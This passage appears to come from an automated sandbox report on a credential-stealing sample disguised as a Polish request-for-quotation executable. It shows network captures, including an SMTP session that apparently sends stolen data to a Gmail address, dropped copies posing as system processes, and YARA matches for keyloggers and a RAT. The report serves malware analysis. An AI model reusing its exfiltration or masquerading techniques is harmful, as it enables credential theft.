                                                                                                                                                                                                                                                    2024-10-29 12:08:44 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    146192.168.2.56051713.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:44 UTC192OUTGET /rules/rule702550v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:44 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:44 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 1378
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BE584C214"
                                                                                                                                                                                                                                                    x-ms-request-id: 2d08e37c-b01e-0021-309c-27cab7000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120844Z-17c5cb586f6b6kj91vqtm6kxaw0000000550000000007ht2
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:44 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    147192.168.2.56051813.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:44 UTC192OUTGET /rules/rule701351v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:44 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:44 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 1407
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BE687B46A"
                                                                                                                                                                                                                                                    x-ms-request-id: 5278af64-001e-0034-3fad-26dd04000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120844Z-16849878b78z2wx67pvzz63kdg0000000530000000009xfc
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:44 UTC1407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    148192.168.2.56051913.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:44 UTC192OUTGET /rules/rule701350v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:44 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:44 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 1370
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BDE62E0AB"
                                                                                                                                                                                                                                                    x-ms-request-id: 135a34dd-b01e-0098-371c-27cead000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120844Z-r197bdfb6b4jlq9hppzrdwabps00000001q000000000540u
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:44 UTC1370INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    149192.168.2.56052013.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:44 UTC192OUTGET /rules/rule702151v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:44 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:44 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 1397
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BE156D2EE"
                                                                                                                                                                                                                                                    x-ms-request-id: b4130024-d01e-0082-10a3-26e489000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120844Z-16849878b78p49s6zkwt11bbkn000000066g00000000692c
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:44 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeo


                                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:27.794992924 CET58749778212.44.112.138192.168.2.5220-rcp-43.controlpanel.si ESMTP Exim 4.96.2 #2 Tue, 29 Oct 2024 13:08:27 +0100
                                                                                                                                                                                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                                                                                    220 and/or bulk e-mail.
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:27.797887087 CET49778587192.168.2.5212.44.112.138EHLO 849224
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:28.059811115 CET58749778212.44.112.138192.168.2.5250-rcp-43.controlpanel.si Hello 849224 [173.254.250.72]
                                                                                                                                                                                                                                                    250-SIZE 52428800
                                                                                                                                                                                                                                                    250-8BITMIME
                                                                                                                                                                                                                                                    250-PIPELINING
                                                                                                                                                                                                                                                    250-PIPECONNECT
                                                                                                                                                                                                                                                    250-AUTH PLAIN LOGIN
                                                                                                                                                                                                                                                    250-STARTTLS
                                                                                                                                                                                                                                                    250 HELP
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:28.064295053 CET49778587192.168.2.5212.44.112.138AUTH login c3BsZXRuYXN0cmFuQHRsYWtvdmVjLnNp
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:28.326539040 CET58749778212.44.112.138192.168.2.5334 UGFzc3dvcmQ6
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:28.634689093 CET58749778212.44.112.138192.168.2.5235 Authentication succeeded
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:28.641820908 CET49778587192.168.2.5212.44.112.138MAIL FROM:<spletnastran@tlakovec.si>
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:28.903866053 CET58749778212.44.112.138192.168.2.5250 OK
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:28.904258013 CET49778587192.168.2.5212.44.112.138RCPT TO:<straitjohn249@gmail.com>
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:29.178232908 CET58749778212.44.112.138192.168.2.5250 Accepted
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:29.184178114 CET49778587192.168.2.5212.44.112.138DATA
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:29.446548939 CET58749778212.44.112.138192.168.2.5354 Enter message, ending with "." on a line by itself
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:29.447700024 CET49778587192.168.2.5212.44.112.138.
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:29.845129013 CET58749778212.44.112.138192.168.2.5250 OK id=1t5l1R-0006Np-0z
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:31.530436039 CET49778587192.168.2.5212.44.112.138QUIT
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:31.994628906 CET58749778212.44.112.138192.168.2.5221 rcp-43.controlpanel.si closing connection
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:33.213809967 CET58749809212.44.112.138192.168.2.5220-rcp-43.controlpanel.si ESMTP Exim 4.96.2 #2 Tue, 29 Oct 2024 13:08:33 +0100
                                                                                                                                                                                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                                                                                    220 and/or bulk e-mail.
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:33.214015007 CET49809587192.168.2.5212.44.112.138EHLO 849224
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:33.475265980 CET58749809212.44.112.138192.168.2.5250-rcp-43.controlpanel.si Hello 849224 [173.254.250.72]
                                                                                                                                                                                                                                                    250-SIZE 52428800
                                                                                                                                                                                                                                                    250-8BITMIME
                                                                                                                                                                                                                                                    250-PIPELINING
                                                                                                                                                                                                                                                    250-PIPECONNECT
                                                                                                                                                                                                                                                    250-AUTH PLAIN LOGIN
                                                                                                                                                                                                                                                    250-STARTTLS
                                                                                                                                                                                                                                                    250 HELP
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:33.475455046 CET49809587192.168.2.5212.44.112.138AUTH login c3BsZXRuYXN0cmFuQHRsYWtvdmVjLnNp
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:33.736763954 CET58749809212.44.112.138192.168.2.5334 UGFzc3dvcmQ6
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:34.013556957 CET58749809212.44.112.138192.168.2.5235 Authentication succeeded
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:34.018076897 CET49809587192.168.2.5212.44.112.138MAIL FROM:<spletnastran@tlakovec.si>
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:34.280016899 CET58749809212.44.112.138192.168.2.5250 OK
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:34.298614979 CET49809587192.168.2.5212.44.112.138RCPT TO:<straitjohn249@gmail.com>
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:34.569698095 CET58749809212.44.112.138192.168.2.5250 Accepted
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:34.569863081 CET49809587192.168.2.5212.44.112.138DATA
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:35.049130917 CET58749809212.44.112.138192.168.2.5354 Enter message, ending with "." on a line by itself
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:35.049506903 CET49809587192.168.2.5212.44.112.138.
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:35.051209927 CET58749809212.44.112.138192.168.2.5354 Enter message, ending with "." on a line by itself
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:35.329209089 CET58749809212.44.112.138192.168.2.5250 OK id=1t5l1W-0006Op-2E
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:11.552841902 CET49809587192.168.2.5212.44.112.138QUIT
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:12.018412113 CET58749809212.44.112.138192.168.2.5221 rcp-43.controlpanel.si closing connection

                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                                                                    Start time:08:07:55
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exe"
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:1'524'650 bytes
                                                                                                                                                                                                                                                    MD5 hash:E9698D7F3A85335C8610CDE2FECC54E8
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:1
                                                                                                                                                                                                                                                    Start time:08:07:55
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"c:\users\user\desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe "
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:1'243'595 bytes
                                                                                                                                                                                                                                                    MD5 hash:6A6157CD22CD9558F8579C30632E62C1
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2058258965.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000001.00000002.2058258965.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000001.00000002.2058258965.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.2058258965.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.2058258965.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                    • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000001.00000002.2058258965.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000001.00000002.2058258965.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:2
                                                                                                                                                                                                                                                    Start time:08:07:55
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\icsys.icn.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\icsys.icn.exe
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:281'030 bytes
                                                                                                                                                                                                                                                    MD5 hash:30957BE4D1D5957A9D6433367CEF30EF
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:4
                                                                                                                                                                                                                                                    Start time:08:07:55
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:c:\windows\system\explorer.exe
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:280'955 bytes
                                                                                                                                                                                                                                                    MD5 hash:40D6074239B5794D42186340C0FB7B60
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                    Target ID:5
                                                                                                                                                                                                                                                    Start time:08:07:56
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System\spoolsv.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:c:\windows\system\spoolsv.exe SE
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:281'100 bytes
                                                                                                                                                                                                                                                    MD5 hash:654CCF32F8E2748995C732C707A09AC1
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:6
                                                                                                                                                                                                                                                    Start time:08:07:56
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System\svchost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:c:\windows\system\svchost.exe
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:281'051 bytes
                                                                                                                                                                                                                                                    MD5 hash:EA31FB96DC9A76CAEFA570341CD194E2
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                                                                                    Start time:08:07:56
                                                                                                                                                                                                                                                    Start date:29/10/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System\spoolsv.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:c:\windows\system\spoolsv.exe PR
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    File size:281'100 bytes
                                                                                                                                                                                                                                                    MD5 hash:654CCF32F8E2748995C732C707A09AC1
                                                                                                                                                                                                                                                    Has elevated privileges:true
